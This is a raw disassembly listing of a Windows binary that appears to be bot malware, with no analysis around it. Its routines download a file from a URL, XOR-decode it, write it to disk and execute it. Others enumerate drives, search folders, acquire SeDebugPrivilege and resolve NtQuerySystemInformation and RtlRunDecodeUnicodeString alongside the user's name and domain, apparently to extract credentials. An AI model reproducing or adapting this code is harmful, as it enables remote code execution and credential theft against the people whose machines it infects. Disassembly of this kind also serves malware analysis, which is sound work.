cmp [ebp+var_14], ebx
jnz short loc_4163C1
push ebx
lea eax, [ebp+var_4C4]
push [ebp+var_18]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_1C0]
call sub_409A73
add esp, 14h
loc_4163C1: ; CODE XREF: sub_4161BD+1E2�j
lea eax, [ebp+var_4C4]
push eax
call sub_4151AD
cmp [ebp+var_4], ebx
pop ecx
jz short loc_4163DC
push [ebp+var_4]
call sub_41B05B
pop ecx
loc_4163DC: ; CODE XREF: sub_4161BD+214�j
cmp [ebp+arg_0], ebx
jbe short loc_4163EA
push [ebp+arg_0]
call ds:dword_4CB6EC ; closesocket
loc_4163EA: ; CODE XREF: sub_4161BD+222�j
push [ebp+var_1C]
call sub_40B413
pop ecx
push ebx
call dword_4270CC ; ExitThread
sub_4161BD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4163FA proc near ; DATA XREF: sub_401ACD+627A�o
; sub_401ACD+6ABA�o
var_590 = qword ptr -590h
var_584 = qword ptr -584h
var_510 = byte ptr -510h
var_310 = dword ptr -310h
var_304 = dword ptr -304h
var_2E4 = dword ptr -2E4h
var_2E0 = word ptr -2E0h
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_248 = byte ptr -248h
var_148 = byte ptr -148h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 510h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0AAh
mov esi, eax
lea edi, [ebp+var_2CC]
push 1
rep movsd
pop edi
xor esi, esi
push esi
mov [eax+2A4h], edi
push esi
push esi
lea eax, [ebp+var_248]
push esi
push eax
push ds:dword_4CB604
call ds:dword_4CB558 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+var_18], eax
jz loc_416886
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_148]
push 40000000h
push eax
call dword_4270EC ; CreateFileA
cmp eax, edi
mov [ebp+var_20], eax
jnb short loc_4164C1
lea eax, [ebp+var_148]
push eax
lea eax, [ebp+var_510]
push offset unk_437ED8
push eax
call sub_41B886
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_4164A4
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_409A73
add esp, 14h
loc_4164A4: ; CODE XREF: sub_4163FA+88�j
lea eax, [ebp+var_510]
push eax
call sub_4151AD
push [ebp+var_48]
call sub_40B413
pop ecx
pop ecx
push esi
call dword_4270CC ; ExitThread
loc_4164C1: ; CODE XREF: sub_4163FA+68�j
xor edi, edi
call dword_4270A8 ; GetTickCount
mov ebx, 7D000h
mov dword ptr [ebp+var_8+4], eax
push ebx
call sub_41B4D5
pop ecx
mov [ebp+var_1C], eax
loc_4164DB: ; CODE XREF: sub_4163FA+1B4�j
push 200h
lea eax, [ebp+var_510]
push esi
push eax
call sub_41B590
add esp, 0Ch
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_510]
push 200h
push eax
push [ebp+var_18]
call ds:dword_4CB560 ; InternetReadFile
cmp [ebp+var_34], esi
jz short loc_41651F
push [ebp+arg_0]
lea eax, [ebp+var_510]
push eax
call sub_4168EC
pop ecx
pop ecx
loc_41651F: ; CODE XREF: sub_4163FA+112�j
lea eax, [ebp+var_24]
push esi
push eax
lea eax, [ebp+var_510]
push [ebp+arg_0]
push eax
push [ebp+var_20]
call dword_4270E0 ; WriteFile
cmp edi, ebx
jnb short loc_41655D
mov eax, ebx
sub eax, edi
cmp eax, [ebp+arg_0]
jbe short loc_416547
mov eax, [ebp+arg_0]
loc_416547: ; CODE XREF: sub_4163FA+148�j
push eax
lea eax, [ebp+var_510]
push eax
mov eax, [ebp+var_1C]
add eax, edi
push eax
call sub_41C310
add esp, 0Ch
loc_41655D: ; CODE XREF: sub_4163FA+13F�j
add edi, [ebp+arg_0]
cmp [ebp+var_3C], esi
jz short loc_41656A
cmp edi, [ebp+var_3C]
ja short loc_4165B4
loc_41656A: ; CODE XREF: sub_4163FA+169�j
cmp [ebp+var_44], 1
mov eax, edi
jz short loc_416584
shr eax, 0Ah
push eax
lea eax, [ebp+var_248]
push eax
push offset unk_437EB0
jmp short loc_416594
; ---------------------------------------------------------------------------
loc_416584: ; CODE XREF: sub_4163FA+176�j
shr eax, 0Ah
push eax
lea eax, [ebp+var_248]
push eax
push offset unk_437E88
loc_416594: ; CODE XREF: sub_4163FA+188�j
mov eax, [ebp+var_48]
imul eax, 234h
add eax, offset dword_43E390
push eax
call sub_41B886
add esp, 10h
cmp [ebp+arg_0], esi
ja loc_4164DB
loc_4165B4: ; CODE XREF: sub_4163FA+16E�j
cmp [ebp+var_3C], esi
mov [ebp+var_14], 1
jz short loc_416609
cmp edi, [ebp+var_3C]
jz short loc_416609
push [ebp+var_3C]
lea eax, [ebp+var_510]
mov [ebp+var_14], esi
push edi
push offset unk_437E5C
push eax
call sub_41B886
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_409A73
lea eax, [ebp+var_510]
push eax
call sub_4151AD
add esp, 28h
loc_416609: ; CODE XREF: sub_4163FA+1C4�j
; sub_4163FA+1C9�j
call dword_4270A8 ; GetTickCount
sub eax, dword ptr [ebp+var_8+4]
xor edx, edx
mov ecx, 3E8h
push [ebp+var_20]
div ecx
xor edx, edx
mov ecx, eax
mov eax, edi
inc ecx
div ecx
mov ebx, eax
call dword_427068 ; CloseHandle
push [ebp+var_1C]
call sub_41B0B1
cmp [ebp+var_38], esi
pop ecx
jz short loc_416693
lea eax, [ebp+var_148]
push eax
call sub_4010AB
cmp eax, [ebp+var_38]
pop ecx
jz short loc_416693
push [ebp+var_38]
mov [ebp+var_14], esi
push eax
lea eax, [ebp+var_510]
push offset unk_437E34
push eax
call sub_41B886
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_409A73
lea eax, [ebp+var_510]
push eax
call sub_4151AD
add esp, 28h
loc_416693: ; CODE XREF: sub_4163FA+241�j
; sub_4163FA+253�j
cmp [ebp+var_14], esi
jz loc_4168D3
cmp [ebp+var_44], 1
jz loc_41678E
mov dword ptr [ebp+var_8], ebx
mov dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
push ecx
push ecx
mov dword ptr [ebp+var_8], edi
mov dword ptr [ebp+var_8+4], esi
fmul dbl_4276A8
lea eax, [ebp+var_148]
fstp [esp+584h+var_584]
fild [ebp+var_8]
push eax
push ecx
push ecx
lea eax, [ebp+var_510]
fmul dbl_4276A8
fstp [esp+590h+var_590]
push offset unk_437DFC
push eax
call sub_41B886
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_41670E
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_409A73
add esp, 14h
loc_41670E: ; CODE XREF: sub_4163FA+2F2�j
lea eax, [ebp+var_510]
push eax
call sub_4151AD
cmp [ebp+var_40], 1
pop ecx
jnz loc_4168D3
push 5
push esi
lea eax, [ebp+var_148]
push esi
push eax
push offset aOpen ; "open"
push esi
call ds:dword_4CB5C0
cmp [ebp+var_30], esi
jnz loc_4168D3
lea eax, [ebp+var_148]
push eax
lea eax, [ebp+var_510]
push offset dword_437DE0
push eax
call sub_41B886
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_409A73
lea eax, [ebp+var_510]
push eax
call sub_4151AD
add esp, 24h
jmp loc_4168D3
; ---------------------------------------------------------------------------
loc_41678E: ; CODE XREF: sub_4163FA+2A6�j
mov dword ptr [ebp+var_8], ebx
mov dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
push ecx
push ecx
mov dword ptr [ebp+var_8], edi
mov dword ptr [ebp+var_8+4], esi
fmul dbl_4276A8
lea eax, [ebp+var_148]
fstp [esp+584h+var_584]
fild [ebp+var_8]
push eax
push ecx
push ecx
lea eax, [ebp+var_510]
fmul dbl_4276A8
fstp [esp+590h+var_590]
push offset unk_437D9C
push eax
call sub_41B886
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_4167F6
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_409A73
add esp, 14h
loc_4167F6: ; CODE XREF: sub_4163FA+3DA�j
lea eax, [ebp+var_510]
push eax
call sub_4151AD
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_41B590
push 44h
lea eax, [ebp+var_310]
pop edi
push edi
push esi
push eax
call sub_41B590
add esp, 1Ch
mov [ebp+var_310], edi
lea eax, [ebp+var_10]
mov [ebp+var_304], offset byte_43D808
push 1
mov [ebp+var_2E0], si
pop edi
push eax
lea eax, [ebp+var_310]
push eax
push esi
push esi
push 28h
push esi
push esi
lea eax, [ebp+var_148]
push esi
push eax
push esi
mov [ebp+var_2E4], edi
call dword_42706C ; CreateProcessA
cmp eax, edi
jnz short loc_416878
call ds:dword_4CB5AC ; WSACleanup
call sub_41835A
push esi
call dword_427064 ; ExitProcess
loc_416878: ; CODE XREF: sub_4163FA+46A�j
lea eax, [ebp+var_148]
push eax
push offset unk_437D68
jmp short loc_416892
; ---------------------------------------------------------------------------
loc_416886: ; CODE XREF: sub_4163FA+45�j
lea eax, [ebp+var_248]
push eax
push offset unk_437D3C
loc_416892: ; CODE XREF: sub_4163FA+48A�j
lea eax, [ebp+var_510]
push eax
call sub_41B886
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_4168C6
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_409A73
add esp, 14h
loc_4168C6: ; CODE XREF: sub_4163FA+4AA�j
lea eax, [ebp+var_510]
push eax
call sub_4151AD
pop ecx
loc_4168D3: ; CODE XREF: sub_4163FA+29C�j
; sub_4163FA+325�j ...
push [ebp+var_18]
call ds:dword_4CB688 ; InternetCloseHandle
push [ebp+var_48]
call sub_40B413
pop ecx
push esi
call dword_4270CC ; ExitThread
sub_4163FA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4168EC proc near ; CODE XREF: sub_4163FA+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor ecx, ecx
cmp [esp+arg_4], ecx
jle short locret_416908
loc_4168F8: ; CODE XREF: sub_4168EC+1A�j
mov dl, byte_429094
xor [ecx+eax], dl
inc ecx
cmp ecx, [esp+arg_4]
jl short loc_4168F8
locret_416908: ; CODE XREF: sub_4168EC+A�j
retn
sub_4168EC endp
; =============== S U B R O U T I N E =======================================
sub_416909 proc near ; CODE XREF: sub_401ACD+5842�p
; sub_401ACD+596A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_41D3BE
pop ecx
pop ecx
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_416909 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416923 proc near ; CODE XREF: sub_40F96B+458�p
; sub_40F96B+5FD�p ...
var_38 = byte ptr -38h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
and [ebp+var_4], 0
push ebx
push esi
push edi
push 32h
mov edi, offset dword_4D3288
push 0
push edi
call sub_41B590
mov ebx, [ebp+arg_0]
add esp, 0Ch
lea esi, [ebp+var_38]
loc_416948: ; CODE XREF: sub_416923+5B�j
; sub_416923+61�j
push 0
push 0Ah
push [ebp+arg_4]
push ebx
call sub_41D480
push 0
push 0Ah
push [ebp+arg_4]
add al, 30h
mov [esi], al
inc esi
push ebx
call sub_41D410
mov ebx, eax
or eax, edx
mov [ebp+arg_4], edx
jz short loc_416986
inc [ebp+var_4]
push 3
mov eax, [ebp+var_4]
pop ecx
cdq
idiv ecx
test edx, edx
jnz short loc_416948
mov byte ptr [esi], 2Ch
inc esi
jmp short loc_416948
; ---------------------------------------------------------------------------
loc_416986: ; CODE XREF: sub_416923+4B�j
dec esi
mov eax, edi
loc_416989: ; CODE XREF: sub_416923+73�j
lea ecx, [ebp+var_38]
cmp esi, ecx
jb short loc_416998
mov cl, [esi]
mov [eax], cl
inc eax
dec esi
jmp short loc_416989
; ---------------------------------------------------------------------------
loc_416998: ; CODE XREF: sub_416923+6B�j
and byte ptr [eax], 0
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_416923 endp
; =============== S U B R O U T I N E =======================================
sub_4169A2 proc near ; CODE XREF: sub_416B57+51�p
; sub_416B57+87�p
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_4CB6B4 ; GetDriveTypeA
sub eax, 0
jz short loc_4169E5
dec eax
jz short loc_4169DF
dec eax
dec eax
jz short loc_4169D9
dec eax
jz short loc_4169D3
dec eax
jz short loc_4169CD
dec eax
jz short loc_4169C7
mov eax, offset word_437F2C
retn
; ---------------------------------------------------------------------------
loc_4169C7: ; CODE XREF: sub_4169A2+1D�j
mov eax, offset off_437F28
retn
; ---------------------------------------------------------------------------
loc_4169CD: ; CODE XREF: sub_4169A2+1A�j
mov eax, offset aCdrom ; "Cdrom"
retn
; ---------------------------------------------------------------------------
loc_4169D3: ; CODE XREF: sub_4169A2+17�j
mov eax, offset aNetwork ; "Network"
retn
; ---------------------------------------------------------------------------
loc_4169D9: ; CODE XREF: sub_4169A2+14�j
mov eax, offset aDisk ; "Disk"
retn
; ---------------------------------------------------------------------------
loc_4169DF: ; CODE XREF: sub_4169A2+10�j
mov eax, offset aInvalid ; "Invalid"
retn
; ---------------------------------------------------------------------------
loc_4169E5: ; CODE XREF: sub_4169A2+D�j
mov eax, offset aUnknown ; "Unknown"
retn
sub_4169A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4169EB proc near ; CODE XREF: sub_416A33+12�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
or eax, 0FFFFFFFFh
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov eax, ds:dword_4CB544
test eax, eax
jz short loc_416A20
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_4]
call eax ; GetDiskFreeSpaceExA
loc_416A20: ; CODE XREF: sub_4169EB+22�j
mov eax, [ebp+arg_0]
push esi
push edi
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_4169EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416A33 proc near ; CODE XREF: sub_416B57+17�p
; sub_41AA43+1F3�p
var_198 = byte ptr -198h
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 198h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_18]
push eax
call sub_4169EB
pop ecx
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
push 6
pop ecx
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jz loc_416B11
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jz loc_416B11
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jz loc_416B11
push ebx
mov ebx, 400h
push 0
push ebx
push [ebp+var_14]
push [ebp+var_18]
call sub_41D500
push edx
push eax
call sub_416923
pop ecx
mov edi, offset aSkb ; "%sKB"
pop ecx
mov esi, 80h
push eax
push edi
lea eax, [ebp+var_198]
push esi
push eax
call sub_41B980
add esp, 10h
push 0
push ebx
push [ebp+var_C]
push [ebp+var_10]
call sub_41D500
push edx
push eax
call sub_416923
pop ecx
pop ecx
push eax
push edi
lea eax, [ebp+var_118]
push esi
push eax
call sub_41B980
add esp, 10h
push 0
push ebx
push [ebp+var_4]
push [ebp+var_8]
call sub_41D500
push edx
push eax
call sub_416923
pop ecx
pop ecx
push eax
push edi
lea eax, [ebp+var_98]
push esi
push eax
call sub_41B980
add esp, 10h
pop ebx
jmp short loc_416B43
; ---------------------------------------------------------------------------
loc_416B11: ; CODE XREF: sub_416A33+2C�j
; sub_416A33+3B�j ...
mov esi, offset aFailed ; "failed"
lea eax, [ebp+var_198]
push esi
push eax
call sub_41B886
pop ecx
lea eax, [ebp+var_118]
pop ecx
push esi
push eax
call sub_41B886
pop ecx
lea eax, [ebp+var_98]
pop ecx
push esi
push eax
call sub_41B886
pop ecx
pop ecx
loc_416B43: ; CODE XREF: sub_416A33+DC�j
mov eax, [ebp+arg_0]
push 60h
pop ecx
lea esi, [ebp+var_198]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_416A33 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416B57 proc near ; CODE XREF: sub_416C29+17�p
; sub_416C29+60�p
var_500 = byte ptr -500h
var_300 = byte ptr -300h
var_180 = byte ptr -180h
var_100 = byte ptr -100h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 500h
push ebx
mov ebx, [ebp+arg_C]
push esi
push edi
lea eax, [ebp+var_300]
push ebx
push eax
call sub_416A33
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_300]
rep movsd
push 60h
lea esi, [ebp+var_300]
pop ecx
lea edi, [ebp+var_180]
lea eax, [ebp+var_80]
push offset aFailed ; "failed"
rep movsd
push eax
call sub_41C070
add esp, 10h
test eax, eax
jnz short loc_416BCA
push ebx
push ebx
call sub_4169A2
pop ecx
push eax
push offset unk_437F7C
lea eax, [ebp+var_500]
push 200h
push eax
call sub_41B980
add esp, 14h
jmp short loc_416BFE
; ---------------------------------------------------------------------------
loc_416BCA: ; CODE XREF: sub_416B57+4D�j
lea eax, [ebp+var_180]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_80]
push eax
push ebx
push ebx
call sub_4169A2
pop ecx
push eax
push offset unk_437F40
lea eax, [ebp+var_500]
push 200h
push eax
call sub_41B980
add esp, 20h
loc_416BFE: ; CODE XREF: sub_416B57+71�j
push 1
lea eax, [ebp+var_500]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
lea eax, [ebp+var_500]
push eax
call sub_4151AD
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_416B57 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416C29 proc near ; CODE XREF: sub_401ACD+2554�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp [ebp+arg_C], ebx
jz short loc_416C4A
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_416B57
add esp, 10h
jmp short loc_416CAB
; ---------------------------------------------------------------------------
loc_416C4A: ; CODE XREF: sub_416C29+9�j
push esi
push edi
push ebx
push ebx
call ds:dword_4CB5BC ; GetLogicalDriveStringsA
lea esi, [eax+2]
push esi
call sub_41B4D5
pop ecx
mov edi, eax
push edi
push esi
call ds:dword_4CB5BC ; GetLogicalDriveStringsA
cmp [edi], bl
mov esi, edi
jz short loc_416CA2
loc_416C6E: ; CODE XREF: sub_416C29+77�j
push offset aA_1 ; "A:\\"
push esi
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz short loc_416C91
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_416B57
add esp, 10h
loc_416C91: ; CODE XREF: sub_416C29+54�j
push esi
call sub_41AFE0
cmp [esi+eax+1], bl
lea esi, [esi+eax+1]
pop ecx
jnz short loc_416C6E
loc_416CA2: ; CODE XREF: sub_416C29+43�j
push edi
call sub_41B0B1
pop ecx
pop edi
pop esi
loc_416CAB: ; CODE XREF: sub_416C29+1F�j
pop ebx
pop ebp
retn
sub_416C29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416CAE proc near ; DATA XREF: sub_401ACD+68A0�o
var_49C = byte ptr -49Ch
var_29C = dword ptr -29Ch
var_298 = byte ptr -298h
var_218 = byte ptr -218h
var_115 = byte ptr -115h
var_114 = byte ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 49Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0A7h
mov esi, eax
lea edi, [ebp+var_29C]
rep movsd
mov dword ptr [eax+298h], 1
lea eax, [ebp+var_114]
push eax
call sub_41AFE0
xor ebx, ebx
cmp [ebp+eax+var_115], 5Ch
pop ecx
jnz short loc_416D03
lea eax, [ebp+var_114]
push eax
call sub_41AFE0
pop ecx
mov [ebp+eax+var_115], bl
loc_416D03: ; CODE XREF: sub_416CAE+3F�j
lea eax, [ebp+var_218]
push eax
push offset unk_437FDC
lea eax, [ebp+var_49C]
push 200h
push eax
call sub_41B980
add esp, 10h
cmp [ebp+var_8], ebx
jnz short loc_416D48
push ebx
lea eax, [ebp+var_49C]
push [ebp+var_C]
push eax
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_409A73
add esp, 14h
loc_416D48: ; CODE XREF: sub_416CAE+78�j
lea eax, [ebp+var_114]
push ebx
push eax
lea eax, [ebp+var_218]
push eax
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
push [ebp+var_29C]
call sub_416DC9
add esp, 18h
push eax
lea eax, [ebp+var_49C]
push offset dword_437FBC
push eax
call sub_41B886
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_416DA9
push ebx
lea eax, [ebp+var_49C]
push [ebp+var_C]
push eax
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_409A73
add esp, 14h
loc_416DA9: ; CODE XREF: sub_416CAE+D9�j
lea eax, [ebp+var_49C]
push eax
call sub_4151AD
push [ebp+var_10]
call sub_40B413
pop ecx
pop ecx
push ebx
call dword_4270CC ; ExitThread
pop edi
pop esi
pop ebx
sub_416CAE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416DC9 proc near ; CODE XREF: sub_416CAE+B9�p
; sub_416DC9+9E�p
var_54C = byte ptr -54Ch
var_34C = byte ptr -34Ch
var_248 = byte ptr -248h
var_144 = byte ptr -144h
var_118 = byte ptr -118h
var_117 = byte ptr -117h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 54Ch
push ebx
push esi
push edi
mov esi, 104h
push [ebp+arg_10]
lea eax, [ebp+var_248]
push offset dword_438020
push esi
push eax
call sub_41B980
mov edi, dword_427000
add esp, 10h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_248]
push eax
call edi ; FindFirstFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
mov ebx, offset dword_429AC8
jz short loc_416E86
loc_416E15: ; CODE XREF: sub_416DC9+BB�j
test [ebp+var_144], 10h
jz short loc_416E72
cmp [ebp+var_118], 2Eh
jnz short loc_416E39
cmp [ebp+var_117], 0
jz short loc_416E72
cmp [ebp+var_117], 2Eh
jz short loc_416E72
loc_416E39: ; CODE XREF: sub_416DC9+5C�j
lea eax, [ebp+var_118]
push eax
lea eax, [ebp+var_34C]
push [ebp+arg_10]
push ebx
push esi
push eax
call sub_41B980
push [ebp+arg_14]
lea eax, [ebp+var_34C]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_416DC9
add esp, 2Ch
mov [ebp+arg_14], eax
loc_416E72: ; CODE XREF: sub_416DC9+53�j
; sub_416DC9+65�j ...
lea eax, [ebp+var_144]
push eax
push [ebp+var_4]
call dword_427118 ; FindNextFileA
test eax, eax
jnz short loc_416E15
loc_416E86: ; CODE XREF: sub_416DC9+4A�j
push [ebp+var_4]
call dword_42710C ; FindClose
push [ebp+arg_C]
lea eax, [ebp+var_248]
push [ebp+arg_10]
push ebx
push esi
push eax
call sub_41B980
add esp, 14h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_248]
push eax
call edi ; FindFirstFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_416F0C
loc_416EBD: ; CODE XREF: sub_416DC9+141�j
lea eax, [ebp+var_118]
inc [ebp+arg_14]
push eax
lea eax, [ebp+var_54C]
push [ebp+arg_10]
push offset dword_438004
push 200h
push eax
call sub_41B980
push 1
lea eax, [ebp+var_54C]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 28h
lea eax, [ebp+var_144]
push eax
push esi
call dword_427118 ; FindNextFileA
test eax, eax
jnz short loc_416EBD
loc_416F0C: ; CODE XREF: sub_416DC9+F2�j
push esi
call dword_42710C ; FindClose
mov eax, [ebp+arg_14]
pop edi
pop esi
pop ebx
leave
retn
sub_416DC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416F1B proc near ; DATA XREF: sub_401ACD+1CD0�o
var_29C = byte ptr -29Ch
var_9C = dword ptr -9Ch
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 29Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 25h
pop ecx
mov esi, eax
lea edi, [ebp+var_9C]
push 1
rep movsd
pop esi
mov [eax+90h], esi
call sub_41A8F5
cmp eax, esi
mov [ebp+var_4], eax
jz short loc_416F5A
cmp eax, 2
jz short loc_416F5A
push offset unk_4381F8
jmp loc_417099
; ---------------------------------------------------------------------------
loc_416F5A: ; CODE XREF: sub_416F1B+2E�j
; sub_416F1B+33�j
push esi
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_419652
pop ecx
test eax, eax
pop ecx
jz loc_417094
push ebx
push offset aNtdll_dll ; "NTDLL.DLL"
call dword_4270B8 ; LoadLibraryA
mov esi, dword_4270BC
mov edi, eax
push offset aNtquerysystemi ; "NtQuerySystemInformation"
push edi
mov [ebp+var_8], edi
call esi ; GetProcAddress
push offset aRtlcreatequery ; "RtlCreateQueryDebugBuffer"
push edi
mov ds:dword_4D44CC, eax
call esi ; GetProcAddress
push offset aRtlqueryproces ; "RtlQueryProcessDebugInformation"
push edi
mov ds:dword_4D44C0, eax
call esi ; GetProcAddress
push offset aRtldestroyquer ; "RtlDestroyQueryDebugBuffer"
push edi
mov ds:dword_4D46D0, eax
call esi ; GetProcAddress
push offset aRtlrundecodeun ; "RtlRunDecodeUnicodeString"
push edi
mov ds:dword_4D44C8, eax
call esi ; GetProcAddress
mov ds:dword_4D44C4, eax
call sub_4170ED
test eax, eax
mov [ebp+arg_0], eax
jz loc_417067
mov esi, dword_42713C
mov edi, 400h
mov ebx, offset dword_4D34C0
push edi
push ebx
push offset aUsername ; "USERNAME"
call esi ; GetEnvironmentVariableW
push edi
mov edi, offset dword_4D3CC0
push edi
push offset aUserdomain ; "USERDOMAIN"
call esi ; GetEnvironmentVariableW
cmp [ebp+var_4], 1
push offset dword_4D46D8
push [ebp+arg_0]
jnz short loc_417013
call sub_417276
jmp short loc_417018
; ---------------------------------------------------------------------------
loc_417013: ; CODE XREF: sub_416F1B+EF�j
call sub_41741D
loc_417018: ; CODE XREF: sub_416F1B+F6�j
pop ecx
test eax, eax
pop ecx
jz short loc_417060
cmp ds:dword_4D46D8, 0
jnz short loc_417047
push ebx
push edi
push [ebp+arg_0]
lea eax, [ebp+var_29C]
push offset unk_4380C0
push 200h
push eax
call sub_41B980
add esp, 18h
jmp short loc_41707A
; ---------------------------------------------------------------------------
loc_417047: ; CODE XREF: sub_416F1B+10A�j
cmp [ebp+var_4], 1
push [ebp+arg_0]
jnz short loc_417057
call sub_417553
jmp short loc_41705C
; ---------------------------------------------------------------------------
loc_417057: ; CODE XREF: sub_416F1B+133�j
call sub_4175EA
loc_41705C: ; CODE XREF: sub_416F1B+13A�j
pop ecx
push eax
jmp short loc_41706C
